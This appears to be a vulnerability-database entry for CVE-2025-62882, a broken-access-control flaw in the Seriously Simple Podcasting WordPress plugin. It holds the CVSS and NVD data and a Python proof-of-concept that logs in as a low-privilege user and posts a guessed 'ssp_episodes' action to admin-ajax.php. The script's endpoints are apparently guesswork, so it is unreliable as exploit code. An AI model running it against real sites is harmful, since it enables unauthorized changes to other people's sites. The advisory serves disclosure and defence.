Security Vulnerability Report
中文
CVE-2025-62882 CVSS 4.3 MEDIUM

CVE-2025-62882

Published: 2025-10-27 02:15:47
Last Modified: 2026-04-27 17:16:34

Description

Missing Authorization vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:castos:seriously_simple_podcasting:*:*:*:*:*:wordpress:*:* - VULNERABLE
Seriously Simple Podcasting <= 3.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62882 PoC - Seriously Simple Podcasting Broken Access Control # Target: WordPress site with Seriously Simple Podcasting plugin <= 3.13.0 TARGET_URL = "http://target-wordpress-site.com" # Attacker needs a low-privilege account (subscriber role recommended) USERNAME = "attacker" PASSWORD = "password" def get_auth_cookie(): """Obtain authentication cookie via WordPress login""" login_url = f"{TARGET_URL}/wp-login.php" data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In" } session = requests.Session() response = session.post(login_url, data=data) return session.cookies.get_dict() def exploit_broken_access_control(cookies): """Exploit missing authorization in Seriously Simple Podcasting""" # Identify vulnerable endpoint - typically in admin-ajax.php or REST API vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/ssp/v1/" ] # Common vulnerable actions in SSP plugin # Modify podcast settings without proper capability check exploit_data = { "action": "ssp_episodes", "episode_id": "1", "series_id": "1" } for endpoint in vulnerable_endpoints: try: response = requests.post( endpoint, data=exploit_data, cookies=cookies, timeout=10 ) if response.status_code == 200: print(f"[!] Possible vulnerability at: {endpoint}") print(f"Response: {response.text[:500]}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": print("[*] CVE-2025-62882 PoC - Seriously Simple Podcasting Broken Access Control") print("[*] Target: Seriously Simple Podcasting <= 3.13.0") cookies = get_auth_cookie() if cookies: print("[+] Authentication successful") exploit_broken_access_control(cookies) else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62882", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:46.940", "lastModified": "2026-04-27T17:16:34.030", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:castos:seriously_simple_podcasting:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.14.0", "matchCriteriaId": "201F9458-7BDE-4E42-85DD-AB15D5B6A90E"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}